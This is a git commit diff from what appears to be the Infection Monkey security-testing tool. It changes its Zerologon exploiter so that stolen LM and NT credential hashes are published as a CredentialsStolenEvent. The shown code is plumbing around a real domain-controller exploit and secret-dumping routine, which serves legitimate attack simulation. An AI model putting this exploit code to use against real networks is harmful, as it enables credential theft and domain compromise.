Agent: Modify Zerologon to publish CredentialsStolenEvent

This commit is contained in:
Ilija Lazoroski 2022-08-15 17:58:05 +02:00
parent f171e548f3
commit 76bbe62c3b
1 changed files with 20 additions and 8 deletions

View File

@ -9,7 +9,8 @@ import os
import re import re
import tempfile import tempfile
from binascii import unhexlify from binascii import unhexlify
from typing import Dict, List, Optional, Tuple from time import time
from typing import Dict, List, Optional, Sequence, Tuple
import impacket import impacket
from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport
@ -17,6 +18,8 @@ from impacket.dcerpc.v5.dtypes import NULL
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from common.credentials import Credentials, LMHash, NTHash, Username from common.credentials import Credentials, LMHash, NTHash, Username
from common.events import CredentialsStolenEvent
from infection_monkey.config import IGUID
from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.wmi_tools import WmiTools from infection_monkey.exploit.tools.wmi_tools import WmiTools
from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
@ -284,14 +287,23 @@ class ZerologonExploiter(HostExploiter):
def send_extracted_creds_as_credential_telemetry( def send_extracted_creds_as_credential_telemetry(
self, user: str, lmhash: str, nthash: str self, user: str, lmhash: str, nthash: str
) -> None: ) -> None:
self.telemetry_messenger.send_telemetry( extracted_credentials = [
CredentialsTelem( Credentials(Username(user), LMHash(lmhash)),
[ Credentials(Username(user), NTHash(nthash)),
Credentials(Username(user), LMHash(lmhash)), ]
Credentials(Username(user), NTHash(nthash)),
] self.telemetry_messenger.send_telemetry(CredentialsTelem(extracted_credentials))
) self._publish_credentials_stolen_event(extracted_credentials)
def _publish_credentials_stolen_event(self, extracted_credentials: Sequence[Credentials]):
credentials_stolen_event = CredentialsStolenEvent(
source=IGUID,
target=None,
timestamp=time(),
tags=({"ZerologonCredentialsStolen"}),
stolen_credentials=extracted_credentials,
) )
self.event_queue.publish(credentials_stolen_event)
def get_original_pwd_nthash(self, username: str, user_pwd_hashes: List[str]) -> str: def get_original_pwd_nthash(self, username: str, user_pwd_hashes: List[str]) -> str:
if not self.save_HKLM_keys_locally(username, user_pwd_hashes): if not self.save_HKLM_keys_locally(username, user_pwd_hashes):